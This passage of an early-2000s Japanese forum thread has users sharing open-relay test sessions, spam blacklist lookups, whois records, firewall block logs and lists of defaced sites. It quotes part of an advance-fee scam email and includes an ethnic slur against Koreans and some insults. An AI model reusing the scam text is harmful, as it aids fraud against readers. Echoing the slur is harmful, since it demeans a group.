>HELO rlytest.nanet.co.jp
<250 spf6.us4.outblaze.com Hello ns.nanet.co.jp [210.164.52.3], pleased to meet you
>MAIL FROM:< TEST.www.nanet.co.jp/rlytest/requestedfrom[208.198.157.136]@mail-com.mr.outblaze.com >
<<< 550 5.0.0< TEST.www.nanet.co.jp/rlytest/requestedfrom[208.198.157.136]@mail-com.mr.outblaze.com >... spammer
正常:中継は拒否されました。

mail-com-bk.mr.outblaze.com (pri=20)
<220 spf2.us4.outblaze.com ESMTP Sendmail 8.11.6/8.11.6/us4-yg
>HELO rlytest.nanet.co.jp
<250 spf2.us4.outblaze.com Hello ns.nanet.co.jp [210.164.52.3], pleased to meet you
>MAIL FROM:< TEST.www.nanet.co.jp/rlytest/requestedfrom[zilucas_at_mail_dot_com]@mail-com-bk.mr.outblaze.com >
<<< 550 5.0.0< TEST.www.nanet.co.jp/rlytest/requestedfrom[208.198.157.136]@mail-com-bk.mr.outblaze.com >... spammer
正常:中継は拒否されました。

333 :これがもと:02/08/08 23:18
Received: from 208.198.157.136 (HELO localhst2137.com) (208.198.157.136)
by ** with SMTP; **
From:"LUCAS ZIZI"< zilucas@mail.com >
Reply-to: zilucas@mail.com
To: topef@hyperia.com help@uu.net postmaster@outblaze.com support@biz.pbase.net
208_198_157_136@hyperia.com 208_198_157_136@uu.net
zilucas_at_mail_dot_com@corpmail.outblaze.com zilucas_mail_com@biz.pbase.net
スパマーのアドレス jab1@lists.inglesa.net
Date:**
Subject:REPLY SOON!
X-Mailer:Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version:1.0
Content-Type:text/plain; charset="us-ascii"
Content-Transfer-Encoding:quoted-printable

MR. LUCAS ZIZI
TEL: +873 - 762 - 864 - 170
FAX: +873 - 762 - 864 - 172 Date: 08/08/ 2002
Email: zilucas@mail.com

Dear Sir,

I am Mr. Lucas Zizi, Bank Manager of Standard Bank of South Africa. I have
urgent and very confidential business proposition for you.

On June 6, 1999, an American Mining Consultant/Contractor with the South
African Mining Corporation, Mr. Ken Power made a numbered time (Fixed)
Deposit for twelve (12) calendar months, valued at US$28,000,000.00 (Twenty-Eight
Million Dollars) in my branch. Upon maturity, I sent a routine
notification to his forwarding address but got no reply. After a month, we sent a
reminder and finally we discovered from his contract employers, the South


334 :名無しさん@お腹いっぱい。:02/08/08 23:53
>>333






文字も読めない奴はけーん

335 :不正な中継を受け付けます:02/08/10 01:47
mail.covad.net (pri=10)
<220 smtpa.covad.net ESMTP LL/Sendmail 8.9 [NO UCE, C=US, L=PA]
>HELO rlytest.nanet.co.jp
<250 smtpa.covad.net Hello ns.nanet.co.jp [210.164.52.3], pleased to meet you
>MAIL FROM:< TESTwww.nanet.co.jp/rlytest/requestedfrom[66.166.162.253]@mail.covad.net >
<250 < TESTwww.nanet.co.jp/rlytest/requestedfrom[66.166.162.253]@mail.covad.net >
... Sender ok
>RCPT TO:<rlytest@nanet.co.jp>
<250 <rlytest@nanet.co.jp>... Recipient ok
>QUIT
<221 smtpa.covad.net closing connection
問題あり:不正な中継を受け付けます。
(63.65.123.25)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

336 :335の続き 不正中継ホストとして登録されています:02/08/10 01:50
http://www.ordb.org/lookup/?host=mail.covad.net
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: mail.covad.net (63.65.123.25)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2001-07-02 17:13 GMT
初回送信ホスト: 127.0.0.1
最終検査日時: 2002-07-30 16:59 GMT
不正中継が確認されたメールのヘッダ情報:
Date: Tue, 30 Jul 2002 12:59:01 -0400 (EDT)
Message-Id: < 200207301659.MAA17548@smtp2.covad.net >
From: spamtest@smtp6.array3.laserlink.net
To: "marvin%marvin.ordb.org"@smtp2.covad.net
X-ORDB-Envelope-From: spamtest@smtp6.covad.net
X-ORDB-Envelope-To: "marvin%marvin.ordb.org"
Subject: ORDB.org check (0.5750955812981150.5232234471) ip=63.65.123.25
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from smtp2.covad.net (psmtp2.array3.laserlink.net [63.65.123.52])
by BocksCar.ORDB.org (Postfix) with ESMTP id 314495BD6
for ; Tue, 30 Jul 2002 16:59:03 +0000 (GMT)
Received: from localhost.localdomain (dns.fgnet.dk [212.242.88.3])
by smtp2.covad.net (8.9.3/8.9.3) with ESMTP id MAA17548
for <"marvin%marvin.ordb.org">; Tue, 30 Jul 2002 12:59:01 -0400 (EDT)

337 :ホストの検索 - その他の RBL への登録状況:02/08/11 16:41
Search results for: 209.167.239.15
Digital Connexxions 209.167.239.0 - 209.167.239.63
btaylor@dconx.com
UUNET Technologies, Inc.
20 Bay Street, Suite 1300 Toronto, ON M5J 2N8 CA
209.167.0.0 - 209.167.255.255
registrar@UUNET.CA
ホストの検索 - その他の RBL への登録状況
http://spamcop.net/w3m?action=checkblock&ip=209.167.239.15

338 :名無しさん@お腹いっぱい。:02/08/11 17:19
*.xy-ddn.sn.cninfo.net
61.185.28.46

339 :名無しさん@お腹いっぱい。:02/08/11 19:34
は〜・・・・・うちの所は、
・米国
・中国
・国内
でし。
アタック開始と共にログが流れ出すと、とりあえず臨戦態勢には入るんですが、
ぞっとします。
こんなへぼい研究所に入ったって、何にも無いのに〜〜〜〜。

340 :名無しさん@お腹いっぱい。:02/08/11 21:06
inetnum: 210.85.0.0 - 210.85.255.255
netname: ETWEBS-TW
descr: ETWebs Taiwan Co. Ltd.
descr: Taiwan Cable Modem Service Provider
descr: Taiwan CATV operator
descr: General Internet Service Provider
country: TW
admin-c: HE6-AP
tech-c: HE6-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-AP-ETWEBS
changed: hostmaster@apnic.net 20010510
source: APNIC

person: Hostmaster ETWebs
address: 1F, No.108, Zuikuang Rd., Neihu Dist., Taipei, Taiwan, R.O.C.
country: TW
phone: +886-2-87921111
fax-no: +886-2-87920000
e-mail: admin@ethome.net
nic-hdl: HE6-AP
mnt-by: MAINT-AP-ETWEBS
changed: admin@ethome.net 20010511
source: APNIC

台湾からのお客様らしい
何の用だ?

341 :名無しさん@お腹いっぱい。:02/08/11 21:19
フラグメントアッタクはどうにもならんよ、
どうにかしてちょ

342 : :02/08/13 00:53
アフガニスタン初のインターネットカフェ登場
http://hwj-www.hotwired.co.jp/news/news/Business/story/20020809104.html
「タリバン公式サイト」の謎http://www.hotwired.co.jp/news/news/culture/story/20011031203.html
タリバンが使用していた、公表されている4つの電子メールアドレスのうち、
『 afghan@brain.net.pk 』だけは依然として利用されているのが明らかだ。
http://www.google.com/search?q=afghan@brain.net.pk&ie=UTF-8&oe=UTF-8&hl=ja&lr=

ブレイン・ネットワークス社
http://www.brain.net.pk/ http://www.brain.net.pk/index.html
http://uptime.netcraft.com/up/graph?site=www.brain.net.pk&submit=Examine
http://uptime.netcraft.com/up/hosted?netname=BRAIN-PK,203.128.0.0,203.128.7.255
http://www.apnic.net/apnic-bin/whois2.pl?key=203.128.7.10&results=a&type=all&source=&inv=
The site www.brain.net.pk is running Apache/1.3.23 (Unix) (Red-Hat/Linux) mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26 on Linux.

343 :ホストの検索 - その他の RBL への登録状況:02/08/13 18:33
ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=64.86.155.148
http://spews.org/ask.cgi?S1576
http://spews.org/ask.cgi?S1809
http://spamcop.net/bl.shtml?64.86.155.148

Search results for: 64.86.155.148
64.86.155.0 - 64.86.155.255 TOC@HYPERIA.COM
64.86.0.0 - 64.86.255.255 ip-addr@teleglobe.com

344 :名無しさん@お腹いっぱい。:02/08/14 14:26
61.254.248.119

345 :6:02/08/14 23:43
栃木県

346 :不正中継ホストとして登録されています:02/08/16 13:10
http://www.ordb.org/lookup/?host=kmldo.kuban.ru
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: kmldo.kuban.ru (195.161.45.36)
ORDB.org への初回登録日時: 2002-08-07 22:03 GMT
初回送信ホスト: 195.161.47.18
最終検査日時: 2002-08-11 06:03 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from mail.kuban.ru (mail.kuban.ru [195.161.47.18])
by BocksCar.ORDB.org (Postfix) with ESMTP id 89CA354D1
for ; Sun, 11 Aug 2002 06:02:58 +0000 (GMT)
Received: from localhost (kmldo.kuban.ru [195.161.45.36])
by mail.kuban.ru (8.11.1/8.11.1) with SMTP id g7B42uS90113
for <@kmldo.kuban.ru:marvin@marvin.ordb.org>;
Sun, 11 Aug 2002 08:02:56 +0400 (MSD)
Date: Sun, 11 Aug 2002 08:02:56 +0400 (MSD)
Message-Id:< 200208110402_g7B42uS90113@mail.kuban.ru >
Received: from localhost.localdomain ([62.79.90.71])
by kmldo.kuban.ru with ESMTP id 67867 for
<@kmldo.kuban.ru:marvin@marvin.ordb.org>; Sun, 11 Aug 2002 08:00:28 +0100
X-Mail-Server: Eserv/2.98/
From: spamtest@[195.161.45.36]
To: "@kmldo.kuban.ru":marvin@marvin.ordb.org
X-ORDB-Envelope-From: spamtest@[195.161.45.36]
X-ORDB-Envelope-To: @kmldo.kuban.ru:marvin@marvin.ordb.org
Subject: ORDB.org check (0.9169390603479710.4183592861) ip=195.161.45.36
X-Archived: msg.CyKOw380@mail.kuban.ru

http://www.ordb.org/lookup/rbls/?host=kmldo.kuban.ru
ホストの検索 - その他の RBL への登録状況
http://spamcop.net/w3m?action=checkblock&ip=195.161.45.36

347 :名無しさん@お腹いっぱい。:02/08/16 13:40
今日初めてウイルスバスターのログ見ました。
中国、韓国うじゃうじゃ。
なんじゃこりゅあー!!

348 :名無しさん@お腹いっぱい。:02/08/17 17:24
>>347
VBでそれだけあるってことは実不正アクセスはその三倍くらいあるんだろ(プ

349 :ホストの検索 - その他の RBL への登録状況:02/08/17 17:27
http://www.ordb.org/lookup/?host=tx.028.co.jp
データベースの検索結果: tx.028.co.jp (219.96.201.22)
ホスト tx.028.co.jp は ORDB.org のデータベースに登録されていません。

http://www.ordb.org/lookup/rbls/?host=tx.028.co.jp
ホストの検索 - その他の RBL への登録状況
http://relays.visi.com/nph-l?219.96.201.22
http://relays.visi.com/nph-s?219.96.201.22
Relay test data
http://relays.visi.com/nph-s?219.96.201.22
RSL Entry Lookup
219.96.201.22 (tx.028.co.jp) is listed on the RSL.
Date listed: Fri Jun 21 18:34:59 CDT 2002
We notified postmaster@028.co.jp and abuse@028.co.jp
of this listing on Fri Jun 21 18:35:05 CDT 2002.

350 :名無しさん@お腹いっぱい。:02/08/18 01:25
>>316
あなたみたいなスパイには教えられません。

351 :名無しさん@お腹いっぱい。:02/08/18 18:33
>>349 うるせー馬鹿

352 :丸太顔:02/08/19 01:12
お尋ねします
Return-Path: <f-ak.0728.40375@*o*o*o.ne.jp>
(*は伏字)
このようなアドレスから不審なメールを受け取ったのですが
偽装でしょうか?ご意見お聞かせください。

353 :名無しさん@お腹いっぱい。:02/08/19 01:18
>>352
偽装。
異常。

354 :丸太顔:02/08/19 01:37
夜分どうも。やはり偽装ですよね。
異常の度合いはどのくらいでしょう(笑)

実は、警察の嘱託の補導員に付け回されたり
頻繁に何者かに不法侵入を受けたり、
6月には窃盗の被害を受けました。異常です。
送信者を突き止める方法はないでしょうか?

メールのヘッダーは以下の通りです。*は伏字です。
Return-Path: <f-ak.0728.40375@docomo.ne.jp>
Received: from mx28.docomo.ne.jp ([210.136.161.101]) by t-mta5.odn.ne.jp
with SMTP
id <20020818014825278.ZHPJ.968.t-mta5.odn.ne.jp@mta5.odn.ne.jp>
for <******@ams.odn.ne.jp>; Sun, 18 Aug 2002 10:48:25 +0900
From: f-ak.0728.40375@docomo.ne.jp
To: *****@ams.odn.ne.jp
Subject: =?ISO-2022-JP?B?GyRCJCokTyRoJCYkNCQ2JCQkXiQ5GyhK?=
Date: Sun, 18 Aug 2002 10:48:25 +0900
Message-ID: <3d5efce9.00010298N0@docomo.ne.jp>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit


355 :353:02/08/19 02:17
異常=以上だよ。
プロバイダーに言え。
以上。

356 :名無しさん@お腹いっぱい。:02/08/19 17:33
株式会社シエアサイト (SHARESITE Corporation)
SHARESITE [210.239.44.0 <-> 210.239.44.63] 210.239.44.0/26
ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.)
SUBA-113-044 [サブアロケーション] 210.239.44.0

日本企業からきた(;´Д`)
これは、高度な技術を持つハッカーが接続を乗っ取るために用いる手法です。
ハッカーは、IP スプーフィングやシーケンス番号を推測することによって、
ユーザーの接続を妨害したり、その接続に自分たち のデータを送りつけたりします。
成功すると、ハッカーがシステムを制御できるようになります。

(((((;゚Д゚))))ガクガクブルブル 
みんな気をつけれ

357 :名無しさん@お腹いっぱい。:02/08/19 17:37
>>356
検索かけたら元々ブラックリストにのってる危ない企業みたいですな。ご用心あれ。

358 :問題あり:不正な中継を受け付けます:02/08/21 00:23
http://www.nanet.co.jp/rlytest/relaytest.html
wux1.svcoffer.com (pri=10)
<220 mail.emailsvc.net ESMTP
>HELO rlytest.nanet.co.jp
<250 Hello rlytest.nanet.co.jp
>MAIL FROM:< TESTwww.nanet.co.jp/rlytest/requestedfrom[210.174.168.200]@wux1.svcoffer.com >
<250 Sender OK
>RCPT TO:<rlytest@nanet.co.jp>
<250 Sender OK
>QUIT
<221 Done
問題あり:不正な中継を受け付けます。
(66.115.46.226)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません

ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=64.32.63.82
http://spews.org/html/S808.html
http://spamcop.net/w3m?action=checkblock&ip=64.32.63.82

359 : :02/08/22 14:26
80.133.148.24
しつこいんだよ

360 :改竄されています:02/08/23 23:27
改竄されています
http://www.cplabo.co.jp/
http://uptime.netcraft.com/up/graph?site=www.cplabo.co.jp&submit=Examine

http://www.misatok.co.jp/
http://uptime.netcraft.com/up/graph?mode_u=on&mode_w=on&site=www.misatok.co.jp

http://vls.imira.co.jp/
http://uptime.netcraft.com/up/graph?mode_u=on&mode_w=on&site=vls.imira.co.jp

361 :名無しさん@お腹いっぱい。:02/08/23 23:30
んーこの改竄されてますでageてんのはニュー速厨かな?

362 :インバウンド IP 断片をブロックしました:02/08/24 02:55
ms-sql-s をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは ms-sql-s
リモートアドレス、 サービスは 61.138.228.75,13780
プロセス名は N/A

http-proxy をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは http-proxy
リモートアドレス、 サービスは 62.211.217.128,21541
プロセス名は N/A

インバウンド IP 断片をブロックしました。 詳細:
プロトコル TCP
リモートアドレス 219.163.87.10
ローカルアドレス

ftp をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは ftp
リモートアドレス、 サービスは 80.13.42.33,1253
プロセス名は N/A

domain をブロックしました。 詳細:
アウトバウンド UDP パケット
ローカルアドレス、 サービスは 0.0.0.0,1671
リモートアドレス、 サービスは **,domain
プロセス名は C:\PROGRAM FILES\INTERNET EXPLORER\DW15.EXE

363 :6588 をブロックしました:02/08/24 18:30
6588 をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 6588
リモートアドレス、 サービスは 207.99.78.37,5719
プロセス名は N/A

ftp をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは ftp
リモートアドレス、 サービスは 61.36.241.20,ftp
プロセス名は N/A

364 :名無しさん@お腹いっぱい。:02/08/24 18:32
つまらん

365 :名無しさん@お腹いっぱい。:02/08/25 09:17


366 :改竄されています。:02/08/27 00:17
改竄されています。
http://www3.runnet.co.jp/
http://www.t-takechi.co.jp/
http://www1.yoronotaki.co.jp/
http://219.101.134.37/

何故か全て、
Microsoft-IIS/4.0 on NT4/Windows 98

http://uptime.netcraft.com/up/graph?site=www3.runnet.co.jp&submit=Examine
http://uptime.netcraft.com/up/graph?site=219.101.134.37

367 :名無しさん@お腹いっぱい。:02/08/27 03:40
tamagon@par.odn.ne.jp> こいつだ

368 :名無しさん@お腹いっぱい。:02/08/27 13:04
>>153

※注意!ハングル板で広まっている以下の旧データは誤りである疑いが濃厚です!

====疑惑の旧データ===
「読売新聞社と韓国日報社がアジア各国でおこなった共同世論調査」
               (1995年5月23日・読売新聞)
『日本と韓国に対してそれぞれ否定的な印象を持っている各国人の割合』
中国人         対日37.8%   対韓31.1%
インドネシア人     対日13.9%   対韓33.3%
マレーシア人      対日 2.9%   対韓33.3%
タイ人         対日21.6%   対韓61.2%
ベトナム人       対日 1.1%   対韓41.3%

====再計算された新データ===
「読売新聞社・韓国日報社・ギャラップグループがアジア各国でおこなった共同世論調査」
               (1995年5月23日・読売新聞)
『日本と韓国に対してそれぞれ否定的な印象を持っている各国人の割合』
中国人         対日37.8%   対韓31.1%
インドネシア人     対日13.9%   対韓33.3%
マレーシア人      対日 2.9%   対韓18.3%
タイ人         対日19.5%   対韓56.3%
ベトナム人       対日 1.1%   対韓10.8%

ソース:
http://academy.2ch.net/korea/kako/1023/10235/1023556332.html
の392-446あたり。あるいは
http://ex.2ch.net/test/read.cgi/korea/1025194249/16-26


369 : :02/08/28 19:03
スパムよりhttp://www.nanet.co.jp/rlytest/relaytest.html
mo5.emailsvc.net
<<< 220 mail.emailsvc.net ESMTP
>>> HELO rlytest.nanet.co.jp
<<< 250 Hello rlytest.nanet.co.jp
<<< 250 Sender OK
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 Sender OK
>>> QUIT
<<< 221 Done
問題あり:不正な中継を受け付けます。(209.196.35.158)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

mo5.promocast.net
<<< 220 mail.emailsvc.net ESMTP
>>> HELO rlytest.nanet.co.jp
<<< 250 Hello rlytest.nanet.co.jp
<<< 250 Sender OK
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 Sender OK
>>> QUIT
<<< 221 Done
問題あり:不正な中継を受け付けます。
(209.196.35.158)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

370 :名無しさん@お腹いっぱい。:02/08/28 19:11
>>369はあげ荒らし

371 :たすけて・・・:02/08/28 19:57
うちに大量のジャンクメールが来るようになり、
ムカついて全て自動返信しているのですが、
それ以前からウィルスにやられているようで、
この前ノートンでインストールしてチェックしたら
PCがイカレて結局それアンインストールしたらPC使えるようになりました。
そしてこの間からアウトルックが送信不能です。
HOTMAIL使ってメールは送れますが、
この私のPCをクリーニングする方法あるんでしょうか・・
既に末期??
ジャンクメールの原因はきっとアダルトサイトからの攻撃。(w

オマケ:NON−PORTABLE IPアドレスって何?




372 :名無しさん@お腹いっぱい。:02/08/28 20:04
>>371 ☆ウィルス情報&質問 総合スレッド☆part5
http://pc.2ch.net/test/read.cgi/sec/1027397623/
特にスレの前の方よく読んどけ。用語は検索しろ。以上

373 :たすけて・・・:02/08/28 20:25
ありがとうございます。調べてみます。。

374 :改竄されています:02/08/29 11:21
改竄されています
http://tx.028.co.jp/

http://whois.nic.ad.jp/cgi-bin/whois_gw?key=028.CO.JP
http://uptime.netcraft.com/up/graph?site=tx.028.co.jp
OS Server Last changed IP address Netblock Owner
NT4/Windows 98 Microsoft-IIS/3.0 18-Aug-2002 219.96.201.22 NTT COMMUNICATIONS CORPORATION
tx.028.co.jpはスパムメールを送信しています。
http://tmp.2ch.net/test/read.cgi/tubo/1026829452/225-228

ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=tx.028.co.jp
http://relays.visi.com/nph-l?219.96.201.22
We notified postmaster@028.co.jp and abuse@028.co.jp
of this listing on Fri Jun 21 18:35:05 CDT 2002.

375 :名無しさん@お腹いっぱい。:02/08/29 18:43
変な奴

376 :問題あり:不正な中継を受け付けます。:02/08/29 19:52
http://www.nanet.co.jp/rlytest/relaytest.html
smtp.yukaido.ne.jp
<220 smtp.yukaido.ne.jp ESMTP
>HELO rlytest.nanet.co.jp
<250 smtp.yukaido.ne.jp
>MAIL FROM:< TESTwww.nanet.co.jp/rlytest/requestedfrom[209.196.35.156]@smtp.yukaido.ne.jp >
<250 ok
>RCPT TO:<rlytest@nanet.co.jp>
<250 ok
>QUIT
<221 smtp.yukaido.ne.jp
問題あり:不正な中継を受け付けます。
(210.230.82.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

377 :ホストの検索 - その他の RBL への登録状況:02/08/29 19:53
ホストの検索 - その他の RBL への登録状況
Host: smtp.yukaido.ne.jp (210.230.82.4)
http://www.ordb.org/lookup/rbls/?host=smtp.yukaido.ne.jp
http://dsbl.org/listing.php?ip=210.230.82.4&submit=Retrieve+Information
http://njabl.org/cgi-bin/lookup.cgi?query=210.230.82.4
210.230.82.4 is listed as either an open relay or direct spam source.
The following comment is associated with this record: relay tested
It was added to the list: Sat Dec 8 00:54:03 2001 EST
http://openrbl.org/ip/210/230/82/4.htm

http://ordb.org/translation/#not_a_relay
ファイヤーウォール等によりアクセス制限を行っているサイトでは、
ORDB.org からの通信が拒否されることがあります。
この場合は当方の中継設定に関する検査は行えません。
smtp.yukaido.ne.jpは不正中継を受け付けるがORDB未登録。

378 :名無しさん@お腹いっぱい。:02/08/29 23:41
変なやつ

379 : :02/08/31 02:12
www.cgiboy.com,http をブロックしました。 詳細:
アウトバウンド TCP 接続
ローカルアドレス、 サービスは localhost,1248
リモートアドレス、 サービスは www.cgiboy.com,http
プロセス名は C:\JUST\TARO12\TARO12.EXE

380 :ホストの検索 - その他の RBL への登録状況:02/09/01 02:05
ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=216.206.81.219
http://spews.org/html/S359.html
http://spamcop.net/w3m?action=checkblock&ip=216.206.81.219

Search results for: 216.206.81.219
Qwest Communications
216.206.0.0 - 216.207.255.255
support@qwestip.net abuse@qwest.net
FREEWEBLAND
216.206.80.0 - 216.206.81.255
admin@northernisp.com

nslookup 216.206.81.219
Name: r81h219.dixie-net.com
Address: 216.206.81.219

381 :ふーん?:02/09/01 12:39
61.82.82.165が台フー15の中
立ち寄る

382 :不正中継ホストとして登録されています:02/09/01 18:06
このホストは ORDB.org に不正中継ホストとして登録されています。
http://www.ordb.org/lookup/?host=alphome.co.kr
http://www.ordb.org/lookup/?host=mail.alphome.co.kr
データベースの検索結果: mail.alphome.co.kr (218.49.78.132)
初回送信ホスト: 157.25.5.250
最終検査日時: 2002-08-31 23:50 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@groundzero.ordb.org
Received: from web_alphome.alphome.co.kr (unknown [218.49.78.132])
by groundzero.ordb.org (Postfix) with SMTP id CBB3A5B101
for ; Sat, 31 Aug 2002 23:49:35 +0000 (GMT)
Received: from localhost.localdomain (unverified [212.242.88.2])
by web_alphome.alphome.co.kr (EMWAC SMTPRS 0.83) with SMTP id ;
Sun, 01 Sep 2002 07:00:59 +0900
Date: Sun, 01 Sep 2002 07:00:59 +0900
Message-ID:
From: spamtest@localhost.ordb.org
To: marvin@marvin.ordb.org
X-ORDB-Envelope-From: spamtest@localhost
X-ORDB-Envelope-To: marvin@marvin.ordb.org
Subject: ORDB.org check (0.4680899801574580.1807471934) ip=218.49.78.132

383 :真似の寅:02/09/01 19:12
203.212.2.159
天津〜北京を経て来たよ
今夜は麻婆豆腐で一杯やろう


384 :名無しさん@お腹いっぱい。:02/09/01 21:16
自分のPCが踏み台になっちゃあアレだけど
俺のPC自体被害受けても別に惜しくはないねPCは激安中古だし
中身が何故か「全国県の花と木一覧」のテキストデータと
ゲーソフの「ストロングホールド」がインストされてるだけだし
おやすみアタリ前田のクラッカーさん





385 :名無しさん@お腹いっぱい。:02/09/02 00:38
うざ〜
Name: 24-205-146-150.riv-eres.charterpipeline.net
Address: 24.205.146.150

Registrant:
Charter Communications (CHARTERPIPELINE2-DOM)
2215 W. Mission Rd.
Alhambra, CA 91802
US

Domain Name: CHARTERPIPELINE.NET

Administrative Contact, Technical Contact:
Admin, DNS (JM23075)hostmaster@SLAGG.NET
Slagg Enterprises
727 Monterey Pass Rd
Monterey Park, CA 91754
US
626-537-6700 626-537-6668

Record expires on 05-Nov-2003.
Record created on 05-Nov-1998.
Database last updated on 1-Sep-2002 11:20:31 EDT.

Domain servers in listed order:

NS1.CHARTERPIPELINE.NET 24.205.1.14
NS2.CHARTERPIPELINE.NET 24.205.1.62
NS3.CHARTERPIPELINE.NET 24.205.192.36
NS4.CHARTERPIPELINE.NET 24.205.224.36


386 :  :02/09/02 00:42
俺のパソコンも中古でしょっぼいんだよね。
しかもたいしたデーターも入ってないし。
不正アクセス毎日御苦労さま〜とか思うわ〜。

387 :名無しさん@お腹いっぱい。:02/09/02 09:17
(.it)ってどこの国だろう?


388 :NetBIOSとかやってくるヤシ:02/09/02 15:55
192.168.137.1
OrgName: IANA
OrgID: IANA-2

NetRange: 192.168.0.0 - 192.168.255.255
CIDR: 192.168.0.0/16
NetName: IANA-CBLK1
NetHandle: NET-192-168-0-0-1
Parent: NET-192-0-0-0-0
NetType: Direct Assignment
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: This block is reserved for special purposes.
Please see RFC 1918 for additional information.

RegDate: 1994-03-15
Updated: 2001-10-12

TechHandle: IANA-ARIN
TechName: Internet Corporation for Assigned Names and Number
TechPhone: +1-310-823-9358
TechEmail: res-ip@iana.org

# ARIN Whois database, last updated 2002-08-31 19:05
# Enter ? for additional hints on searching ARIN's Whois database.

389 :名無しさん@お腹いっぱい。:02/09/02 20:16
>>388
私のところにも、まったく同じ奴↑から毎日来る。
遮断してるんだけど、↑からばかりだから
気持ち悪いんだよね。
COUNTRYはUSなんだろうか?

390 :名無しさん@お腹いっぱい。:02/09/02 23:57
株式会社アイ・ピー・レボルーション (IP Revolution Inc.)
SUBA-440-111 [サブアロケーション] 219.101.137.0
アネックス株式会社 (ANNEX Corporation)
MSGANNEX-NET [219.101.137.64 <-> 219.101.137.127] 219.101.137.64/26


うぜえ!!tracerouteすな!!通れないとわかるとping attackかよ!!

391 :名無しさん@お腹いっぱい。:02/09/03 00:02
あのさ、海外からクラックされる原因って串かIP表示板、
アクセス解析で抜かれた場合が殆どでしょ?

392 :名無しさん@お腹いっぱい。:02/09/03 00:07
>>391
スイープスキャンとかやったこと有る??
今時ウイルスもスキャナ積んでる時代だYo-

393 :名無しさん@お腹いっぱい。:02/09/03 01:24
>>388>>389
192.168...ってさあ・・・
ローカルアドレスにwhoisするなよ
IANAの名前が出た時点でそれがどういうことか分からない
人はwhois使っちゃダメってことだよ

394 :名無しさん@お腹いっぱい。:02/09/03 10:38
北京から来来
61.171.32.133

395 :名無しさん@お腹いっぱい。:02/09/03 13:07
韓国からCodeRedらしき攻撃毎日来る。無差別。

396 :さっきから何度もトロイ:02/09/04 04:16
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC

NetRange: 219.0.0.0 - 219.255.255.255
CIDR: 219.0.0.0/8
NetName: APNIC5
NetHandle: NET-219-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS.RIPE.NET
NameServer: RS2.ARIN.NET
Comment: This IP address range is not registered in the ARIN database.
For details, refer to the APNIC Whois Database via
WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
** IMPORTANT NOTE: APNIC is the Regional Internet Registry
for the Asia Pacific region. APNIC does not operate networks
using this IP address range and is not able to investigate
spam or abuse reports relating to these addresses. For more
help, refer to http://www.apnic.net/info/faq/abuse

RegDate:
Updated: 2001-10-15

TechHandle: SA90-ARIN
TechName: System Administrator, System
TechPhone: +61 7 3858 3100
TechEmail:

# ARIN Whois database, last updated 2002-09-02 19:05
# Enter ? for additional hints on searching ARIN's Whois database.

397 :あぼーん:あぼーん
あぼーん

398 :名無しさん@お腹いっぱい。:02/09/04 04:21
痔部んで殺れ

399 :不正中継が確認されたメールのヘッダ情報:02/09/04 22:24
http://www.ordb.org/lookup/?host=211.9.203.31
データベースの検索結果: 211.9.203.31 (211.9.203.31)
ORDB.org への初回登録日時: 2002-09-04 09:06 GMT
最終検査日時: 2002-09-04 09:06 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from www40.secure.ne.jp (www40.secure.ne.jp [211.9.203.2])
by BocksCar.ORDB.org (Postfix) with ESMTP id A9D6158EC
for ; Wed, 4 Sep 2002 09:06:45 +0000 (GMT)
Received: from localhost.localdomain (dns.fgnet.dk [212.242.88.3])
by www40.secure.ne.jp (8.9.3+3.1W/3.7Wpl2-05/08/02) with ESMTP id SAA07107
for ; Wed, 4 Sep 2002 18:06:41 +0900 (JST)
Date: Wed, 4 Sep 2002 18:06:41 +0900 (JST)
Message-Id: < 200209040906.SAA07107@www40.secure.ne.jp >
From: spamtest@sakebun.com
To: marvin@marvin.ordb.org@www40.secure.ne.jp
X-ORDB-Envelope-From: spamtest@sakebun.com
X-ORDB-Envelope-To: marvin@marvin.ordb.org@[211.9.203.31]
Subject: ORDB.org check (0.6718541504719510.3879064999) ip=211.9.203.31

nslookup www.sakebun.com
Name: www.sakebun.com
Address: 211.9.203.31

400 :名無しさん@お腹いっぱい。:02/09/04 22:28
チョンがおおい

401 :キヤノン(Canon)インターネットサービスは第三者中継を行います:02/09/05 16:36
キヤノン(Canon)インターネットサービスは第三者中継を行います。
http://www.canonet.ne.jp/
http://www.canonet.ne.jp/service/kaka_00.html
